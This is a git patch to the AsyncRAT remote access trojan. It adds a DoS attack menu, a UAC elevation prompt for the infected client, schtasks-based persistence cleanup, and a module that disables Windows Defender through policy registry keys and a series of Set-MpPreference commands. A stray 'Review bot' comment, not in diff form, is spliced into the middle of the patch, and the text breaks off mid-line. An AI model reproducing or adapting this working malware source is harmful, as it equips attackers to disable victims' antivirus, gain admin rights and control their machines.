From 73acd52efe7f6a1e3a4b0c61fc0326f111077575 Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Thu, 9 May 2019 06:27:20 -0700 Subject: [PATCH] Update Added dos attack Added disable windows defender Added ask for uac prompt Fix install privileges --- .../AsyncRAT-Sharp/AsyncRAT-Sharp.csproj | 2 + .../AsyncRAT-Sharp/Forms/Form1.Designer.cs | 62 +++++++-- AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs | 88 ++++++++++-- .../Handle Packet/HandleListView.cs | 1 + .../Properties/Resources.Designer.cs | 20 +++ .../AsyncRAT-Sharp/Properties/Resources.resx | 16 ++- .../AsyncRAT-Sharp/Resources/disabled.png | Bin 0 -> 815 bytes AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png | Bin 0 -> 1806 bytes AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs | 2 +- AsyncRAT-C#/Client/Client.csproj | 2 + AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs | 36 +++++ .../Client/Handle Packet/HandleUninstall.cs | 18 ++- .../Handle Packet/HandleWindowsDefender.cs | 129 ++++++++++++++++++ AsyncRAT-C#/Client/Handle Packet/Packet.cs | 28 ++-- AsyncRAT-C#/Client/Install/NormalStartup.cs | 21 ++- AsyncRAT-C#/Client/Settings.cs | 2 +- AsyncRAT-C#/Client/Sockets/ClientSocket.cs | 2 + 17 files changed, 387 insertions(+), 42 deletions(-) create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png create mode 100644 AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs create mode 100644 AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj index fee5432..c5c450b 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj +++ b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj @@ -219,6 +219,8 @@ + + diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs index 12e0864..23762ae 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs 
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs @@ -38,6 +38,7 @@ this.lv_os = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_version = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_prefor = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components); this.cLIENTOPTIONSToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.cLOSEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); 
@@ -51,15 +52,18 @@ this.sENDFILETOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.rEMOTEDESKTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.kEYLOGGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.fILEMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.dISABLESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.wINDOWDSDEFENDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.bOTKILLERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.uSBSPREADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator(); this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator(); this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); - this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.statusStrip1 = new System.Windows.Forms.StatusStrip(); this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); this.ping = new System.Windows.Forms.Timer(this.components); @@ -103,7 +107,8 @@ this.lv_user, this.lv_os, this.lv_version, - this.lv_prefor}); + this.lv_prefor, + this.lv_admin}); this.listView1.ContextMenuStrip = this.contextMenuStrip1; this.listView1.Dock = System.Windows.Forms.DockStyle.Fill; this.listView1.FullRowSelect = true; 
@@ -154,6 +159,11 @@ this.lv_prefor.Text = "PERFORMANCE"; this.lv_prefor.Width = 170; // + // lv_admin + // + this.lv_admin.Text = "PRIVILEGES"; + this.lv_admin.Width = 138; + // // contextMenuStrip1 // this.contextMenuStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); @@ -169,14 +179,16 @@ this.toolStripMenuItem1, this.fILEMANAGERToolStripMenuItem, this.pROCESSMANAGERToolStripMenuItem, + this.dISABLESToolStripMenuItem, this.bOTKILLERToolStripMenuItem, this.uSBSPREADToolStripMenuItem, + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem, this.toolStripSeparator2, this.bUILDERToolStripMenuItem, this.toolStripSeparator3, this.aBOUTToolStripMenuItem}); this.contextMenuStrip1.Name = "contextMenuStrip1"; - this.contextMenuStrip1.Size = new System.Drawing.Size(283, 442); + this.contextMenuStrip1.Size = new System.Drawing.Size(283, 502); // // cLIENTOPTIONSToolStripMenuItem // @@ -271,6 +283,14 @@ this.kEYLOGGERToolStripMenuItem.Text = "KEYLOGGER"; this.kEYLOGGERToolStripMenuItem.Click += new System.EventHandler(this.KEYLOGGERToolStripMenuItem_Click); // + // toolStripMenuItem1 + // + this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos; + this.toolStripMenuItem1.Name = "toolStripMenuItem1"; + this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30); + this.toolStripMenuItem1.Text = "DOS ATTACK"; + this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click); + // // fILEMANAGERToolStripMenuItem // this.fILEMANAGERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.filemanager; 
@@ -287,6 +307,22 @@ this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER"; this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click); // + // dISABLESToolStripMenuItem + // + this.dISABLESToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.wINDOWDSDEFENDERToolStripMenuItem}); + this.dISABLESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled; + this.dISABLESToolStripMenuItem.Name = "dISABLESToolStripMenuItem"; + this.dISABLESToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.dISABLESToolStripMenuItem.Text = "DISABLES"; + // + // wINDOWDSDEFENDERToolStripMenuItem + // + this.wINDOWDSDEFENDERToolStripMenuItem.Name = "wINDOWDSDEFENDERToolStripMenuItem"; + this.wINDOWDSDEFENDERToolStripMenuItem.Size = new System.Drawing.Size(289, 30); + this.wINDOWDSDEFENDERToolStripMenuItem.Text = "WINDOWDS DEFENDER"; + this.wINDOWDSDEFENDERToolStripMenuItem.Click += new System.EventHandler(this.WINDOWDSDEFENDERToolStripMenuItem_Click); + // // bOTKILLERToolStripMenuItem // this.bOTKILLERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.botkiller; 
@@ -303,6 +339,14 @@ this.uSBSPREADToolStripMenuItem.Text = "USB SPREAD"; this.uSBSPREADToolStripMenuItem.Click += new System.EventHandler(this.USBSPREADToolStripMenuItem_Click); // + // gETADMINISTRATORPRIVILEGESToolStripMenuItem + // + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Name = "gETADMINISTRATORPRIVILEGESToolStripMenuItem"; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Text = "GET ADMIN PRIVILEGES"; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Click += new System.EventHandler(this.GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click); + // // toolStripSeparator2 // this.toolStripSeparator2.Name = "toolStripSeparator2"; @@ -329,14 +373,6 @@ this.aBOUTToolStripMenuItem.Text = "ABOUT"; this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click); // - // toolStripMenuItem1 - // - this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos; - this.toolStripMenuItem1.Name = "toolStripMenuItem1"; - this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30); - this.toolStripMenuItem1.Text = "DOS ATTACK"; - this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click); - // // statusStrip1 // this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); 
@@ -598,6 +634,10 @@ private System.Windows.Forms.ContextMenuStrip contextMenuStrip3; private System.Windows.Forms.ToolStripMenuItem notificationOFFToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem toolStripMenuItem1; + private System.Windows.Forms.ToolStripMenuItem dISABLESToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem wINDOWDSDEFENDERToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem gETADMINISTRATORPRIVILEGESToolStripMenuItem; + private System.Windows.Forms.ColumnHeader lv_admin; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs index c223b0f..3fa3288 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs @@ -42,7 +42,7 @@ namespace AsyncRAT_Sharp { if (!File.Exists(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"))) { - // File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe); + // File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe); Process.Start(Application.ExecutablePath); Environment.Exit(0); } 
@@ -224,20 +224,24 @@ namespace AsyncRAT_Sharp { if (listView1.SelectedItems.Count > 0) { - try + DialogResult dialogResult = MessageBox.Show(this, "Are you sure you want to unistall", "AsyncRAT | Unistall", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) { - MsgPack msgpack = new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "uninstall"; - foreach (ListViewItem itm in listView1.SelectedItems) + try { - Clients client = (Clients)itm.Tag; - ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "uninstall"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; } - } - catch (Exception ex) - { - MessageBox.Show(ex.Message); - return; } } } 
@@ -644,10 +648,68 @@ namespace AsyncRAT_Sharp Properties.Settings.Default.Save(); } - private readonly FormDOS formDOS = new FormDOS(); + private readonly FormDOS formDOS = new FormDOS(); private void ToolStripMenuItem1_Click(object sender, EventArgs e) { formDOS.Show(); } + + private void WINDOWDSDEFENDERToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + DialogResult dialogResult = MessageBox.Show(this, "Administrator privileges are required!", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "defender"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + if (itm.SubItems[lv_admin.Index].Text == "Administrator") + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } + } + + private void GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + DialogResult dialogResult = MessageBox.Show(this, "Popup UAC prompt? ", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "uac"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + if (itm.SubItems[lv_admin.Index].Text != "Administrator") + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } + } } } \ No newline at end of file 
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs index 9896812..42ba928 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs @@ -31,6 +31,7 @@ namespace AsyncRAT_Sharp.Handle_Packet client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString); + client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString); client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString; client.ID = unpack_msgpack.ForcePathObject("HWID").AsString; Program.form1.listView1.Items.Add(client.LV); diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs index bd510c9..256d970 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs @@ -144,6 +144,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap disabled { + get { + object obj = ResourceManager.GetObject("disabled", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// @@ -264,6 +274,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap uac { + get { + object obj = ResourceManager.GetObject("uac", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// 
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx index 9392c35..48843c2 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx @@ -130,9 +130,18 @@ ..\Resources\arrow_up.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + ..\Resources\play-button.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\disabled.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + + ..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 + ..\Resources\botkiller.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a @@ -178,10 +187,7 @@ ..\Resources\visit.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - ..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - - ..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 + + ..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a \ No newline at end of file 
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png new file mode 100644 index 0000000000000000000000000000000000000000..979db921798090d16d0491a798ca90e809fc75ae GIT binary patch literal 815 zcmeAS@N?(olHy`uVBq!ia0vp^3LwnE0wix1Z>k4UEa{HEjtmSN`?>!lvVtU&J%W50 z7^>757#dm_7=8hT8eT9klo~KFyh>nTu$sZZAYL$MSD+10f+@+{-GzZ+Rj;xUkjGiz z5n0T@z;^_M8K-LVNdpDhOFVsD*&nlVa>_Fu%?$TuU|{^~>EamTaeV4jTYqUsfi`)a z##RPR(XdqqZpKb{V4lFaL?bsqV`77R(n%&wdxj0%Rx1Q}{XB&i)|hmZgm8*93X4p9 zGudLto!O7BrO$tV`1#FK^Jb<$n|pV!tn$gUit|R@XFhWMIIX|VV!7*VnQyafWu|P9 znH92Wvii!4FTE=t_WkB~GBdU-^QCCrEQ5Ywvl-_9`;Cu_rSCXa?Wn0)%PFl`Gb=Ic zica4L!AH|tD@t#_h&d?|`BYFbZ&9pI+u8146BMWKG;{iu7HE9+vr>~@S(Ws4#~*6~ z&UdbOq#SeV;Cb7Y45lY;GRiK@32f{STPL4y-%ubZyDU*w(eKxsp8~oq5zT5&IWBW5 z1#WW`GS~||I@?ffamcA7|3gE?LIG}xwiyT9Z#+=?r_y$X=TR`%AvYUV25VIn=|l$p zj{2VE3YS_%J~UmrFX*+iKC&aBBYt6{K(wUvw4NI-9ko9?1kw$Z9*HR0mGp1wHWgab z)Sh9?dUtaLi?RaW?&k&zY?W(P?G#-7qhtBK7v+MFHdgO%SDJIMQ)H(@$Ll*BA6q-? z+&iN$yKb8h8vNIMbMrdZ<`0&BHzyjkKigb)`1X>9NrFl-Q8~#o)wrkJd?KQsQ#VaS zdz0`!`-8il>-q3p_`2fTjz|-w_sRKNEj#Yd+~{(`UO_QmvAUQh^kMk%6J5u7Rnpfn|t+xs|b@m4T7AfsvJg0i&AF zIus4L`6-!cmAEw&RDTfyYLEok5S*V@Ql40p%1~Zju9umYU7Va)kgAtols@~NjTBH3 NgQu&X%Q~loCIG}QJqZ8+ literal 0 HcmV?d00001 
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png new file mode 100644 index 0000000000000000000000000000000000000000..72e9d43f6879cfe84c42d9388e170f334131dac3 GIT binary patch literal 1806 zcmbVNe{2&~9KW)$m7gm!2o_?_+Z2(uch_I*opcE8Y>Rdj=%C~G_3pL3t-U+$Zfl21 z*%->4(_ogU-3SIv6eFlaiH0Z*KQtH=jS_z(5P~eh@W(J}KoH}*u5G~JFD`la-o5vE zpYQMQ^@W;!QzjZGA_y`i;P);=JI-Mh_msP@Z#RD;+^1D0x7F_ivKH z@=eWQc2he`aoB=Jbbf}01Sz00XeN~u6guO^3cNI2Yuh-679eW78(XLeL?giv>Jept zIxJ2zOWGZ117#tdHakU`P%A;YaKeR?HZ$p@?F4PLqQwV;(qt}1FY`WJlm)-sSVC1L z8pqS=v?Xn`h;ke!DT=}gD{i%#A;PS52`ZB@3rbyy!3z{t<|UOE1yo~XqGE^Y#-OHS zCZwb?t)LX$1RaKF7zrmWgl19!$gyRd)FCGe!Z{WPNst19sz5AR#!3lM6_teeH`L|h zn*>1D27_f8x6~z-DvMCmrcP)^(IK})E8#8);LCs_cE~Jf>V#_6Y1T-zM+S^4%3)DV zmI4(jsf>C&T3{&j{*}DIiD_l-4R?T-QGpxN&dr3wOi*FcPLmC^qhTIlqX}XR8WcG` z)^$s$3&!{+D9jp;QJH@Qb1WSb(6T3KkC+r?C>Ux--nbv|ctWxm z+v2&EK{M#%R+C07?HLCB|Ti7*o@X3>L`OK{jSv}L(h!H;sc0|IPuGVEn0{`l_*qT3npE)4rWIdy7*sbcBu{7+)o zIIybzfyt&Q#u&Et9*v^+P1tJZgKf22dn*}YgS{_8yp!-JYlm_X)9&egVaN7EdoP?k zJAClW+H0Sl-+bisW0%j&89hC6eX~B>KRWc)^bKGC*wUCkMl7wo=XgEXrfV_n_#pT@=?xzJ>OWe#^JlVEJ=yUeZT?~3ctwyx}XC`r`~AL;6Lz`t+0jjr}#3jN_b!bI-ikU3DP<>lb{d@I? zNp~!NtoO*eN6fyph8250YaB>DowxT8iS+PWgIgx`P9EvZ4~{$gP4kN Nfu?5fzC{~){sgxbUx@$! literal 0 HcmV?d00001 diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs index 7186c31..c2b65f1 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs @@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp public static string Password { get; set; } public static Aes256 AES{ get; set; } - public static readonly string Version = "AsyncRAT 0.4.6"; + public static readonly string Version = "AsyncRAT 0.4.7"; } } diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index b48ce74..4fc68ff 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj @@ -80,7 +80,9 @@ + + 
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs new file mode 100644 index 0000000..4204720 --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs @@ -0,0 +1,36 @@ +using Microsoft.Win32; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Security.Principal; +using System.Text; + +namespace Client.Handle_Packet +{ + public class HandleUAC + { + public HandleUAC() + { + if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return; + + try + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = Process.GetCurrentProcess().MainModule.FileName, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true, + Verb = "runas" + } + }; + proc.Start(); + Environment.Exit(0); + } + catch { } + } + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs index 2157f7b..ebfe442 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs @@ -5,6 +5,7 @@ using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Linq; +using System.Security.Principal; using System.Text; namespace Client.Handle_Packet 
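Review bot: `HandleUAC` has no summary, and all of its behaviour sits in the constructor behind an empty `catch { }`, so what happens on success or failure is undocumented. A comment such as `// Relaunches this executable with Verb = "runas" (UAC consent prompt) and exits the unelevated instance; a declined prompt throws and is swallowed` above the `try` would record it. On the host this shows up as a consent prompt for the client binary itself, followed by the same image starting again with an elevated token. If the prompt is declined, the original unelevated process keeps running because `Environment.Exit(0)` is never reached.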
@@ -17,9 +18,22 @@ namespace Client.Handle_Packet { try { - Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); + else + { + Process.Start(new ProcessStartInfo() + { + FileName = "schtasks", + Arguments = $"/delete /tn {Path.GetFileName(Settings.ClientFullPath)} /f", + CreateNoWindow = true, + ErrorDialog = false, + UseShellExecute = true, + WindowStyle = ProcessWindowStyle.Hidden + }); } - catch { } + } + catch { } } ProcessStartInfo Del = null; try diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs b/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs new file mode 100644 index 0000000..ba23c4b --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs 
@@ -0,0 +1,129 @@ +using System; +using Microsoft.Win32; +using System.Diagnostics; +using System.Security.Principal; + +// │ Author : NYAN CAT +// │ Name : Disable Windows Defender v1.0 +// │ Contact : https://github.com/NYAN-x-CAT + +// This program is distributed for educational purposes only. + +namespace Client.Handle_Packet +{ + public class HandleWindowsDefender + { + public HandleWindowsDefender() + { + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return; + + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1"); + RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6 + + CheckDefender(); + } + + private static void RegistryEdit(string regPath, string name, string value) + { + try + { + using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)) + { + if (key == null) + { + Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord); + return; + } + if (key.GetValue(name) != (object)value) + key.SetValue(name, value, RegistryValueKind.DWord); + } + } + catch { } + } + + private static void CheckDefender() + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "powershell", + Arguments = "Get-MpPreference -verbose", + UseShellExecute = false, + RedirectStandardOutput = true, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true + } + }; + proc.Start(); + while (!proc.StandardOutput.EndOfStream) + { + string line = 
proc.StandardOutput.ReadLine(); + + if (line.Contains(@"DisableRealtimeMonitoring") && line.Contains("False")) + RunPS("Set-MpPreference -DisableRealtimeMonitoring $true"); //real-time protection + + else if (line.Contains(@"DisableBehaviorMonitoring") && line.Contains("False")) + RunPS("Set-MpPreference -DisableBehaviorMonitoring $true"); //behavior monitoring + + else if (line.Contains(@"DisableBlockAtFirstSeen") && line.Contains("False")) + RunPS("Set-MpPreference -DisableBlockAtFirstSeen $true"); + + else if (line.Contains(@"DisableIOAVProtection") && line.Contains("False")) + RunPS("Set-MpPreference -DisableIOAVProtection $true"); //scans all downloaded files and attachments + + else if (line.Contains(@"DisablePrivacyMode") && line.Contains("False")) + RunPS("Set-MpPreference -DisablePrivacyMode $true"); //displaying threat history + + else if (line.Contains(@"SignatureDisableUpdateOnStartupWithoutEngine") && line.Contains("False")) + RunPS("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); //definition updates on startup + + else if (line.Contains(@"DisableArchiveScanning") && line.Contains("False")) + RunPS("Set-MpPreference -DisableArchiveScanning $true"); //scan archive files, such as .zip and .cab files + + else if (line.Contains(@"DisableIntrusionPreventionSystem") && line.Contains("False")) + RunPS("Set-MpPreference -DisableIntrusionPreventionSystem $true"); // network protection + + else if (line.Contains(@"DisableScriptScanning") && line.Contains("False")) + RunPS("Set-MpPreference -DisableScriptScanning $true"); //scanning of scripts during scans + + else if (line.Contains(@"SubmitSamplesConsent") && !line.Contains("2")) + RunPS("Set-MpPreference -SubmitSamplesConsent 2"); //MAPSReporting + + else if (line.Contains(@"MAPSReporting") && !line.Contains("0")) + RunPS("Set-MpPreference -MAPSReporting 0"); //MAPSReporting + + else if (line.Contains(@"HighThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference 
